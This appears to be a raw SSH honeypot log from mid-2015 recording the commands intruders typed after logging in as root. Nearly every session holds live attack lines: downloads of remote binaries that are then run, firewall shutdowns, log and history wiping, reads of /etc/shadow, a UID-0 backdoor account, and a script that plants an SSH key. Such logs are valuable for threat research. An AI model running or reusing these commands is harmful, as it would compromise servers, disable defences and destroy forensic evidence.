root w uname -a ifconfig ls -a .bash_history rm -rf .bash_history cat /etc/passwd passwd cat /etc/issue cat /proc/cpuinfo From 216.170.120.156 5-Jun-2015 12:58:29 ssh2 root Exec wget -c http://216.170.125.185/49&&chmod 777 49 wget -c http://216.170.125.185/49&&chmod 777 49 From 89.136.65.218 5-Jun-2015 16:33:09 ssh2 root w ls -a history -c cd /dev/shm ls -a wget http://coxspeed.webs.com/psybnc-linuxRO.tgz From 188.241.34.13 5-Jun-2015 21:26:13 ssh2 root w wget uname -a cd /tmp mkdir ... cd ... pwd ls cd /dev/shm ls From 75.148.0.149 6-Jun-2015 02:19:17 ssh2 root ls ls -a From 75.148.0.149 6-Jun-2015 07:12:21 ssh2 root cd ssh ls wget ftp://188.120.225.162/scan.tgz y ls wget ftp://188.120.225.162/scan.tgz c wget ftp://qwe@qwe:188.120.225.162/scan.tgz c From 192.99.83.237 6-Jun-2015 12:05:25 ssh2 root la ls -a From 75.148.0.149 6-Jun-2015 16:58:29 ssh2 root wget cargo-globe.com/scan.tgz c wget http://cargo-globe.com/scan.tgz httwget arg wget http://cargo-globe.com/scan.tgz -c -o cd wget -c apt-get install wget wgetr wget http://cargo-globe.com/scan.tgz htt wget http://cargo-globe.com/scan.tgz -o -c wget http://cargo-globe.com/scan.tgz -y cd ls ls -a cd root wget Y P apt-get install wget apt-get install zmap cd zmap ls ls -a cd cd ssh ls wget cat /etc/shadow /sbin /ifconfig cd /sbin /ifconfig | grep inet sudo apt-get install openssh-server gunzip ifconfig gksu nautilus wget c -0 -o o O Y P U ls ls -a ls -i cd cd/ /cd ls cd cpan ls ls -a cd a das wget install sudo sudo apt-get install wget apt-get install wget df -h cat /etc/shadow Free free ftp ls /usr/bin cd mbox ls cd netstat sudo /etc/init.d/ssh restart ls -al find nslookup venus wget -r -l s wget -c wget-c From 90.193.250.74 6-Jun-2015 21:51:33 ssh2 root w uname -a ls -al cat .bash_history cd /dev/shm ls -al pwd ls wget canim.home.ro/autopsy.tgz tar zxvf autopsy.tgz rm -rf autopsy.tgz cd .bash ./autorun ./start x wget canim.home.ro/autopsy.tgz ls From 90.193.250.74 7-Jun-2015 02:44:37 ssh2 root pwd dir cd .. rm -rf .bash From 216.170.125.155 7-Jun-2015 06:14:37 ssh2 root Exec wget -c http://104.156.238.159/59&&chmod 777 59 wget -c http://104.156.238.159/59&&chmod 777 59 Exec wget -c http://104.156.238.159/59&&chmod 777 59 wget -c http://104.156.238.159/59&&chmod 777 59 From 90.193.250.74 7-Jun-2015 07:37:41 ssh2 root curl -0 http://canim.home.ro/autopsy.tgz lwp-download http://canim.home.ro/autopsy.tgz wget id /etc/sbin/adduser news cd /etc/sbin ls perl yum install perl gcc fetch From 89.122.230.153 7-Jun-2015 17:23:49 ssh2 root /dns 167.114.3.141 From 107.150.45.147 8-Jun-2015 13:11:43 ssh2 root Exec wget -P/root/ http://107.150.178:88/disk wget -P/root/ http://107.150.178:88/disk From 78.191.200.147 8-Jun-2015 22:42:13 ssh2 root history cd cat /etc/redhat-release From 107.150.45.147 8-Jun-2015 23:30:45 ssh2 root Exec /root/disk /root/disk From 85.186.66.140 9-Jun-2015 08:28:21 ssh2 root w cat /proc/cpuinfo cd /var/tmp ls -a perl wget From 219.151.8.155 9-Jun-2015 09:49:47 ssh2 root netstat -an uname -a ifconfig /etc/init.d/iptables stop cd /usr/local/bin wget http://14.29.49.34:9191/cups-lpd history -c From 85.186.66.140 9-Jun-2015 13:21:25 ssh2 root uname -a wget www.ilegale.altervista.org/lamech.tgz tar xzvf lamech.tgz cd .bashrc chmod cd /tmp ls -a w From 85.186.66.140 9-Jun-2015 18:14:29 ssh2 root su -l ls -a uname -a cat /proc/cpuinfo passwd From 219.151.8.155 9-Jun-2015 20:08:49 ssh2 root rz -e rz re -z te history -c From 78.97.71.160 9-Jun-2015 23:07:33 ssh2 root w passwd ls -a cd /tmp wget angelfire.com/komales88/muh.tgz tar zxvf muh.tgz tar zxvf muh.jpg rm -rf muh.tgz muh.jpg cd lib chmod +x * ls -a From 109.163.234.4 11-Jun-2015 04:25:57 ssh2 root export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 pwd bash sh /bin/bash locate bash uname -a unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 cat /etc/paswd From 108.61.220.135 11-Jun-2015 23:43:59 ssh2 root Exec wget -c http://104.156.238.159/79&&chmod 777 79 wget -c http://104.156.238.159/79&&chmod 777 79 From 89.136.65.218 12-Jun-2015 09:44:21 ssh2 root w uname -a ls -a From 42.49.222.185 12-Jun-2015 10:03:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.244.151.123:1416/qq;chmod 777 qq;./qq; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.244.151.123:1416/qq chmod 777 qq ./qq From 79.112.192.156 12-Jun-2015 14:37:25 ssh2 root uname -a id w unset rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null w exit From 87.118.91.140 13-Jun-2015 00:23:33 ssh2 root id uptime whoami exit From 94.185.83.2 13-Jun-2015 05:16:37 ssh2 root unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE= w ps -ef df -h From 216.170.125.155 13-Jun-2015 06:41:05 ssh2 root Exec wget -c http://104.156.238.159/76&&chmod 777 76 wget -c http://104.156.238.159/76&&chmod 777 76 From 118.193.184.113 14-Jun-2015 00:48:53 ssh2 root wget http://118.193.184.113:6688/2016facai chmod +x 2016facai ./2016facai chattr +i ps -ef From 172.245.96.111 14-Jun-2015 13:38:11 ssh2 root Exec wget -c http://104.156.238.159/49&&chmod 777 49 wget -c http://104.156.238.159/49&&chmod 777 49 From 82.159.232.126 15-Jun-2015 06:07:17 ssh2 root Exec ls -al ls -al From 87.234.16.114 17-Jun-2015 02:04:53 ssh2 root w ps x ls ls -alLF cd .xauthFt555r ls wget joint.host.sk/muhlinux.tar curl wget w ftp cd .. ls cat test.pl ls cd Mail ls ls -alLF w exit From 140.75.228.193 17-Jun-2015 03:32:23 ssh2 root uname -a cd .ssh ls cat test.pl ls -la test.pl cd .. ls -la cd .ssh ls -la cd .ssh ls -la cd /sbin wget http://222.186.34.91:6513/java wget wget -O http://222.186.34.91:6513/java wget -c http://222.186.34.91:6513/java history -c su history exit From 144.76.33.39 17-Jun-2015 06:57:57 ssh2 root unset HISTFILE HISTSAVE w uname -a cat /etc/passwd cat /etc/issue uname - cat /etc/hosts ls -al cat ftp.openbsd.org cd ftp.openbsd.org ls -la pwd ls -la cat .bash_history cd .. wget ls -al exit From 221.238.22.8 17-Jun-2015 13:51:25 ssh2 root netstat -tnp cd /sbin ls -la java wget http://222.186.34.91:6513/java history -c exit From 216.170.125.155 18-Jun-2015 00:10:27 ssh2 root Exec wget -c http://104.156.238.159/59&&chmod 777 59 wget -c http://104.156.238.159/59&&chmod 777 59 From 93.34.226.103 18-Jun-2015 07:23:17 ssh2 root w wget curl ftp lynx wget ftp://sibmedinfo:sibmedinfo@89.31.114.110/cartier.tgz wget -c wget -O ftp://sibmedinfo:sibmedinfo@89.31.114.110/cartier.tg w uname -a ftp id ps x ls ls -alLF cat test1.pl pico test1.pl vi test1.pl joe pico cat test.pl kill -9 -1 killall -9 -1 halt ps x From 222.186.58.131 18-Jun-2015 10:29:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.131:8081/3560;chmod 755 3560;./3560; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.131:8081/3560 chmod 755 3560 ./3560 From 222.186.58.131 18-Jun-2015 20:48:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.131:8081/3560;chmod 777 3560;./3560; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.131:8081/3560 chmod 777 3560 ./3560 From 119.73.36.13 19-Jun-2015 07:48:37 ssh2 root w uname -a yum apt-get perl apt-get install perl perl ps x cd /var/tmp ls -a nano test.pl cat test.pltest.pl cat test.pl cat test1.pl cat reglas.pl From 119.73.36.13 19-Jun-2015 12:41:41 ssh2 root w cat /proc/cpuinfo cat /etc/hsots cat /etc/issue cat /etc/hosts ifconfig ls -a pwd wget df -h ls cat ipcalc.pl nano apt-get install nano vi ipcalc.pl From 5.9.137.39 19-Jun-2015 17:34:45 ssh2 root ps x ls -a cd /var/tmp vi ls -a cd /tmp ls -a wc -l test.pl rm rm -rf rm -rf .Xresources ls -a From 5.14.0.213 19-Jun-2015 22:27:49 ssh2 root w uname -a passwd pwd cd /var/tmp ls -all cd .Gabber-spool ls -all cd .xauth ls -all cd ls -all From 222.186.21.181 20-Jun-2015 13:07:01 ssh2 root Exec killall -I -q .sshd gg ggu ggy killall -I -q .sshd gg ggu ggy From 222.186.21.181 20-Jun-2015 18:00:05 ssh2 root Exec killall -I -q .sshd gg ggu ggy killall -I -q .sshd gg ggu ggy Exec killall -I -q .sshd gg ggu ggy killall -I -q .sshd gg ggu ggy From 85.186.66.140 20-Jun-2015 22:53:09 ssh2 root w cat /proc/cpuinfo From 61.174.49.51 21-Jun-2015 00:23:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.174.49.51:10068/cc3600;chmod 777 cc3600;./cc3600; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://61.174.49.51:10068/cc3600 chmod 777 cc3600 ./cc3600 From 122.236.240.217 21-Jun-2015 08:39:17 ssh2 root ss ls cd ss curl http://112.124.65.90:23456/.ss -O /root/.ss chmod 0777 /usr/bin/curl chmod 0777 /usr/bin/wget chmod 0777 wget http://112.124.65.90:23456/.ss curl http://112.124.65.90:23456/.ss -O /root/.ss uname -a From 222.186.21.103 21-Jun-2015 10:42:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -chttp://222.186.21.103:10086/ddd1d;chmod 777 ddd1d;./ddd1d; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -chttp://222.186.21.103:10086/ddd1d chmod 777 ddd1d ./ddd1d From 222.186.21.103 21-Jun-2015 21:01:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.103:10086/ddd1b;chmod 777 ddd1b;./ddd1b; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.103:10086/ddd1b chmod 777 ddd1b ./ddd1b From 210.178.24.242 23-Jun-2015 03:58:51 ssh2 root NETSTAT -TNP netstat -tnp cd /sbin ls -la java cat test.pl history -c exit From 193.109.69.17 23-Jun-2015 14:17:53 ssh2 root Exec BASH_HISTORY=/dev/null; HISTORY=/dev/null; history=/dev/null; HISTFILE=/dev/null; HISTFILESIZE=0; unset HISTFILE; unset SAVEHIST; echo '#!/bin/sh PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null; export PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null; LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null; export LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null; BASH_HISTORY=/dev/null; HISTORY=/dev/null; history=/dev/null; HISTFILE=/dev/null; HISTFILESIZE=0; unset HISTFILE; unset SAVEHIST; mkdir -p ~/.ssh; if test -w ~/.ssh; then echo "START"; else chmod +w ~/.ssh; if test -w ~/.ssh; then echo "START"; else echo "-FAIL-: ~/.ssh not writable"; exit; fi; fi; if test -s ~/.ssh/authorized_keys; then authorized_keys="authorized_keys"; else authorized_keys="authorized_keys2"; fi if grep -q "`whoami`@`hostname`" ~/.ssh/$authorized_keys; then grep -v "`whoami`@`hostname`" ~/.ssh/$authorized_keys > ~/.ssh/.tmp; cat ~/.ssh/.tmp > ~/.ssh/$authorized_keys; rm -f ~/.ssh/.tmp; fi if test -s ~/.ssh/id_dsa; then cat ~/.ssh/id_dsa > ~/.ssh/id_dsa.bkp; rm -f ~/.ssh/id_dsa; fi if test -s ~/.ssh/id_dsa.pub; then cat ~/.ssh/id_dsa.pub > ~/.ssh/id_dsa.pub.bkp; rm -f ~/.ssh/id_dsa.pub; fi pass="AncK9FWpRyT"; echo "Pass: $pass"; ssh-keygen -t dsa -N $pass -f ~/.ssh/id_dsa -q && cd ~/.ssh/ && cat id_dsa.pub >> $authorized_keys && cat id_dsa && rm -f id_dsa* && touch -r /etc/passwd $authorized_keys && touch -r /etc/passwd ~/.ssh && echo "+GOOD+"; if test -s ~/.ssh/id_dsa.bkp; then cat ~/.ssh/id_dsa.bkp > ~/.ssh/id_dsa; rm -f ~/.ssh/id_dsa.bkp; fi if test -s ~/.ssh/id_dsa.pub.bkp; then cat ~/.ssh/id_dsa.pub.bkp > ~/.ssh/id_dsa.pub; rm -f ~/.ssh/id_dsa.pub.bkp; fi ' > _.sh;chmod +x _.sh;./_.sh;echo 275164698 > _.sh;rm -f _.sh; BASH_HISTORY=/dev/null HISTORY=/dev/null history=/dev/null HISTFILE=/dev/null HISTFILESIZE=0 unset HISTFILE unset SAVEHIST echo '#!/bin/sh PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null export PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null export LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null BASH_HISTORY=/dev/null HISTORY=/dev/null history=/dev/null HISTFILE=/dev/null HISTFILESIZE=0 unset HISTFILE unset SAVEHIST mkdir -p ~/.ssh if test -w ~/.ssh then echo "START" else chmod +w ~/.ssh if test -w ~/.ssh then echo "START" else echo "-FAIL-: ~/.ssh not writable" exit From 61.174.49.51 23-Jun-2015 20:02:01 ssh2 root wget http://www.baidu.com/tamx32 chomd 0755 tamx32 ./tamx32 & /etc/init.d/iptables stop SuSEfirewall2 stop chmod 0755 /tmp/.sbaoz nohup /tmp/.sbaoz > /dev/null 2>&1 passwd baozi userdel groupdel 10991 ls -l .lbaozm uname -a whoami netstat -ant reboot echo "cd /tmp">>/etc/rc.local echo From 222.186.21.166 24-Jun-2015 05:02:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.166:4428/CCDP;chmod 777 CCDP;./CCDP; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.166:4428/CCDP chmod 777 CCDP ./CCDP From 222.186.21.166 24-Jun-2015 09:55:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.156:3331/ULPM;chmod 777 ULPM;./ULPM; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.156:3331/ULPM chmod 777 ULPM ./ULPM From 61.174.49.51 24-Jun-2015 10:55:57 ssh2 root wget -c http://183.60.233.169:8889/abwdd.t chomd 777 abwdd.t ./abwdd.t & chomd 0777 abwdd.d ./abwdd.d & From 222.186.21.166 24-Jun-2015 19:41:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.166:4429/NAAA;chmod 777 NAAA;./NAAA; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.166:4429/NAAA chmod 777 NAAA ./NAAA From 221.238.22.25 25-Jun-2015 07:34:01 ssh2 root cd /sbin wget http://222.186.34.91:6513/sqlrer wget scp From 188.227.173.194 25-Jun-2015 10:20:37 ssh2 root wget curl cat /pro cp uname -a ps -ax cat /proc/cpuinfo /sbin/ifcon /sbin/ifconfig perl python gcc df -h cd /usr/src wget mineturk.com/skin/3proxy-0.6.1.tgz tar zxpvf 3proxy-0.6.1.tgz cd 3proxy-0.6.1/src replace '1080' '20911' -- socks.c cd ../ make -f Makefile.Linux cd src cp socks /usr/bin/ cd ../.. rm -rf 3proxy* wget cd /usr/src ls -al pwd perl test.pl cat test.pl pwd ls -al pwd cd ~ ls -al cat test.pl cat test1.pl exit From 85.25.43.214 25-Jun-2015 15:13:41 ssh2 root Exec wget http://95.173.183.52/init.s -O /tmp/init.s ; chmod 777 /tmp/init.s ; /tmp/init.s &echo -n '167.114.3.141:' ; cat /tmp/.inits.pid; rm -rf /tmp/init.s wget http://95.173.183.52/init.s -O /tmp/init.s chmod 777 /tmp/init.s /tmp/init.s &echo -n '167.114.3.141:' cat /tmp/.inits.pid rm -rf /tmp/init.s From 188.138.9.49 26-Jun-2015 00:59:49 ssh2 root w set +o history unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null w ls -a cd /var/tmp ls -a ls -a cd /dev/shm ls -a istory history uname -a l s-a history cd /dev/shm s l-a ls -a pwd wget kqs.xp3.biz/cacat/autopsy.tgz wget ftp wget http://kqs.xp3.biz//cacat/autopsy.tgz last perl python apt-get install perl perl From 182.106.215.93 26-Jun-2015 04:12:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.145.198:8484/lian64;chmod 777 lian64;./lian64; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.147.145.198:8484/lian64 chmod 777 lian64 ./lian64 From 67.184.118.95 26-Jun-2015 05:52:53 ssh2 root cat /proc/cpuinfo cd /dev/smh ls -a id w cat /etc/passwd From 109.201.152.243 26-Jun-2015 10:45:57 ssh2 root w' w From 182.106.215.93 26-Jun-2015 14:31:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.145.198:8484/DDos;chmod 777 DDos;./DDos; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.147.145.198:8484/DDos chmod 777 DDos ./DDos From 185.67.204.133 26-Jun-2015 15:39:01 ssh2 root ls history last ethtool eth0 From 23.234.41.180 27-Jun-2015 06:18:13 ssh2 root Exec wget http://180.131.36.98:231/ok -O /tmp/test wget http://180.131.36.98:231/ok -O /tmp/test From 221.238.22.8 27-Jun-2015 11:09:11 ssh2 root uname -a cd /sbin ifconfig ethtool eth0 wget wget http://222.186.34.91:6513/03618.log scp wget -c http://222.186.34.91:6513/03618.log wget -O /sbin/03618.log http://222.186.34.91:6513/03618.log From 178.7.98.248 27-Jun-2015 16:04:21 ssh2 root w uname -a ps x uname -a last -10 ifconfig cd /var/tmp ls -a wget http://bali.hacked.jp:40554/c.jpg ls -a uname -a history -c w ps x ifconfig From 178.7.98.248 27-Jun-2015 20:57:25 ssh2 root w ps x perl yum install perl apt-get install perl wget http://bali.do.am/bali1 history -c w ps x last -1 last w bwho ps x ls -a cd ls -a nano test1.pl vi From 69.92.121.86 28-Jun-2015 01:50:29 ssh2 root w ps x w ps x wget http://bali.do.am/bali1 curl -O http://bali.do.am/bali1 ls -a apt-get install curl apt-get install curl install curl curl install curl curl -O http://bali.do.am/bali1 ls -a ifcomfig From 178.7.98.248 28-Jun-2015 06:43:33 ssh2 root w ps x ifconfig cd /home ls -a adduser owner useradd yum install update yum apt-get apt-get install update apt-get install update &&& perl apt-get install perl perl history -c exit From 39.82.126.58 28-Jun-2015 07:47:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.244.130.201:50/hhh;chmod 777 hhh;./zitao; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.244.130.201:50/hhh chmod 777 hhh ./zitao From 178.17.174.10 29-Jun-2015 21:48:05 ssh2 root set +o history unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null w id uname -a cd /dev/shm/.s cat trueusers.txt w ls -a wget kqs.xp3.biz/cacat/devil.jpg tar xvf devil.jpg perl tmp.txt rm -rf devil.jpg rm -rf tmp.txt w ls -a pwd From 195.254.134.234 30-Jun-2015 02:41:09 ssh2 root unset HISTFILE HISTSIZE HISTSAVE w uname -a ps aux cat /etc/hosts From 115.210.138.107 30-Jun-2015 11:22:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.112.166.151:8080/xudp;chmod 777 xudp;./xudp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.112.166.151:8080/xudp chmod 777 xudp ./xudp From 91.81.221.211 30-Jun-2015 17:20:21 ssh2 root w ls -all ifconfig cat /proc/cpuinfo history ps x ps aux wget uname -a cd /dev/shm ls -a ls mkdir :: mkdir all history -c apt-get install wget history -c w wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz apt-get install wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz history -c ifconfig From 61.174.49.51 30-Jun-2015 21:41:27 ssh2 root service iptables stop /etc/init.d/iptables stop SuSEfirewall2 stop reSuSEfirewall2 chmod 777 RRR22 ./RRR22 & From 94.216.52.226 1-Jul-2015 03:06:29 ssh2 root w uname -a cat /proc/cpuinfo history ls -a ps ux cd /var/tmp ls -a cd " " ls -a perl perlbot.pl cd /dev/shm ls -a perl perlbot.pl cd " " perl perlbot.pl history -c -d offset From 178.7.115.207 1-Jul-2015 12:52:37 ssh2 root ifconfig history -c -d offset From 178.7.115.207 1-Jul-2015 17:45:41 ssh2 root w uname -a cat /proc/cpuinfo cd /dev/shm ls -a cd /var/tmp ls -a mkdir " " cd /root ls -a cd /home ls -a cd /game ls -a cd /var/tmp history wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe From 94.216.55.140 1-Jul-2015 22:38:45 ssh2 root w uname -a cd /dev/shm ls -a wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe From 109.197.81.174 2-Jul-2015 13:17:57 ssh2 root w ls ls -all ifconfig cat /proc/cpuinfo ls nano reglas.pl nano test.pl ls history -c unset HISTFILE unset HISTSAVE unset REMOTEHOST unset REMOTEUSER unset HISTMOVE unset USERHOST history -n unset WATCH export HISTFILE=/dev/null rm -rf .bash_history rm -rf .bash_history rm -rf /var/run/utmp rm -rf ls w rm -rf .bash_history rm -rf /var/run/utmp rm -rf wget yum install wget apt-get install wget wget ls nano yum install nano From 178.10.182.198 2-Jul-2015 18:11:01 ssh2 root w uname -a cat /proc/cpuinfo id ifconfig cd /var/tmp ls -a wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe From 178.10.182.198 2-Jul-2015 23:04:05 ssh2 root history cat /etc/issue ls -a From 78.191.192.92 3-Jul-2015 01:16:37 ssh2 root w history ls cd /etc ls last From 92.53.11.235 3-Jul-2015 03:57:09 ssh2 root ps x w uname -a wget wget botsmk.at.ua/desireNET/desire.tgz From 92.53.11.235 3-Jul-2015 08:50:13 ssh2 root passwd w ps x From 122.242.201.82 3-Jul-2015 11:35:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.7.151.106:8080/linux;chmod 777 linux;./linux; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://61.7.151.106:8080/linux chmod 777 linux ./linux From 18.58.0.191 3-Jul-2015 13:43:17 ssh2 root w uname -a ps x ls -a ls From 84.117.70.153 3-Jul-2015 18:36:21 ssh2 root ls cd .. ls cd .. ls cd / ls wget wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate --no-check-certificate wget -c dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz sudo -s yum install sudo wget ls cd vmware ls cat test.pl pico test.pl From 178.10.178.30 3-Jul-2015 23:29:25 ssh2 root w uname -a cat /proc/cpuinfo cat /etc/issue ls -a cd /dev/shm ls -a cd /var/tmp ls -a mkdir " " wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2ksp3.exe history -c -d offset From 46.217.64.255 4-Jul-2015 09:15:33 ssh2 root w ps x wget http://bali.do.am/bali1 ls -a history -c exit From 77.247.181.165 4-Jul-2015 23:54:45 ssh2 root w cat /proc/cpuinfo ls -a From 83.45.25.176 5-Jul-2015 04:47:49 ssh2 root cat /proc/cpuinfo cat /etc/issue /sbin/ifconfig | grep inet -w -c cat /etc/passwd ps -x uname -a ls -la nano .bash_history vi .bash_history vii .bash_history sshd cd /tmp wget http://djsony.ucoz.com/ssd.jpg c wget http://djsony.ucoz.com/ssd.jpg wget atack.altervista.org/psy.tar cd /var/tmp wget atack.altervista.org/psy.tar From 83.45.25.176 5-Jul-2015 09:40:53 ssh2 root ls -la cd mc ls cd test.pl ls cd Mail ls nano Mali vi Mail last yum qurl w From 37.228.224.211 5-Jul-2015 14:33:57 ssh2 root unset HISTFILE unset HISTSAVE unset SAVEFILE unset ******** w ps x uname -a cat /etc/passwc cat /etc/passwd ls -la sshd wget http://fm.fo/images/cette.jpg tar zxvf cette.jpg rm -rf cette* cd ssh cat /etc/hosts exit From 46.101.205.242 5-Jul-2015 19:27:01 ssh2 root w ps -aux uname -a gcc apt-get apt-get install make cat /etc/passwd cat /etc/shadow ls -la /home pwd cd /home ls -sa adduser apt-get install identd apt-get install identd ps -aux apt-get install irssi adduser C-5 useradd C-5 /root cd /root apt-get adduser useradd apt-get install adduser adduser userdd useradd ifconfig -a last last -a /bin/last apt-get install binutils ls pwd cat /etc/issue cd bin ls -sa cd /bin ls -sa cd /usr/bin ls -sa pwd dir -sa dir pstree cd /root wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz curl http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz exit From 83.45.25.176 6-Jul-2015 00:20:05 ssh2 root wget http://mia.artistas.ro/C-4.bscp From 221.238.22.8 6-Jul-2015 01:29:51 ssh2 root uname -a cd /sbin ls -la sqlrer ls -la java uptime w ifconfig ethtool eth0 netstat -tnp wget http://222.186.34.91:6513/Lwser.sh.x history -c exit From 37.228.224.211 6-Jul-2015 05:13:09 ssh2 root unset HISTFILE unset HISTSAVE unset SAVEFILE unset ******** w sshd ls -la nano test.pl vi test.pl cat /proc/cpuinfo locate vuln From 37.228.224.211 6-Jul-2015 10:06:13 ssh2 root cd /tmp ls -la cat .bash_history cat /etc/passwd cd /etc ls ls -la cd ~ ls -la From 37.228.224.211 6-Jul-2015 14:59:17 ssh2 root /usr/sbin/useradd -o -u 0 -g root gnats From 37.228.224.211 6-Jul-2015 19:52:21 ssh2 root useradd mama adduser perl -v From 37.228.224.211 7-Jul-2015 00:45:25 ssh2 root yum apt-get apt-get install nano From 37.228.224.211 7-Jul-2015 05:38:29 ssh2 root apt-get install perl perl -v From 37.228.224.211 7-Jul-2015 10:31:33 ssh2 root apt-get install perl* apt-get update apt-get upgrade From 37.228.224.211 7-Jul-2015 15:24:37 ssh2 root apt-get install perl free -gt mem memo From 37.228.224.211 7-Jul-2015 20:17:41 ssh2 root netstat -autp netstat -autp -autp netstat -autp -autp -autp -autp -autpts -autp -autp apt-get install wget wget perl -v apt-get install openssl* apt-get install perl* From 37.228.224.211 8-Jul-2015 01:10:45 ssh2 root apt-get install lib apt-get install lib* exit From 124.236.70.212 8-Jul-2015 05:05:01 ssh2 root w wget http://115.239.248.46:8042/yn25 From 49.248.118.228 8-Jul-2015 06:03:49 ssh2 root w uname -a dree -m free -m cat /etc/issue rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null history -c exit From 90.209.64.120 9-Jul-2015 01:36:05 ssh2 root cd /tmp wget martyn.net63.net/q uname -a perl From 193.111.232.132 9-Jul-2015 11:22:13 ssh2 root history -c -d offset unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null w uname -a cat /proc/cpuinfo cat /etc/passwd ls -a cat /etc/passwd id cd /home ls -a /usr/sbin/useradd safe cd | cd ~ pwd ls /a cd /root ls -a cd /tmp ls -a /sbin/ifconfig 